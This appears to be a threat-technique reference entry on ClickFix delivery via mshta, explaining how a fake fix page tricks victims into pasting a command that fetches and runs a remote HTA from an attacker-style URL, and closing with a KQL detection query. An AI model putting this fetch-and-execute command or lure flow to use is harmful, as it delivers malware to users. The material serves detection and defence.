Clickfix MSHTA
Execute a remote HTA (HTML Application) via mshta. Commonly delivered by clickfix. The HTA can run PowerShell, download payloads, or perform other actions.
Built-in Windows binary (LOLBin) that runs HTML Applications and VBScript. Trusted process, often whitelisted.
mshta URL of the attacker-controlled HTA file. mshta fetches it and executes the VBScript/JScript inside.
https://fix-support.to/p.hta- 1
Victim runs the command
The
mshtaone-liner is presented on a fake support or fix page. The page copies the command to the clipboard, then prompts the victim to press Win+R, Ctrl+V, and Enter. - 2
Fetch and execute HTA
mshtafetches the HTA fromhttps://fix-support.to/p.htaand executes it. No download dialog. The HTA contains VBScript or JScript that can run PowerShell, download payloads, or perform other actions.
- •One-liner. A single command is easy to paste and run. Low friction for the victim.
- •LOLBin. mshta is a built-in Windows binary. Trusted process name, often whitelisted by security tools.
- •No download dialog. Unlike a browser download, mshta fetches and runs in one step. Less user friction.
- •Full script control. The HTA can contain any VBScript/JScript. Change the file at the URL and the same command delivers a different payload.
- •Attacker-controlled at any time. Update the HTA on the server. No need to redistribute links or documents.
DeviceProcessEvents | where Timestamp > ago(7d) | where FileName =~ "mshta.exe" and ProcessCommandLine contains "http" | project Timestamp, DeviceName, AccountName, ProcessCommandLine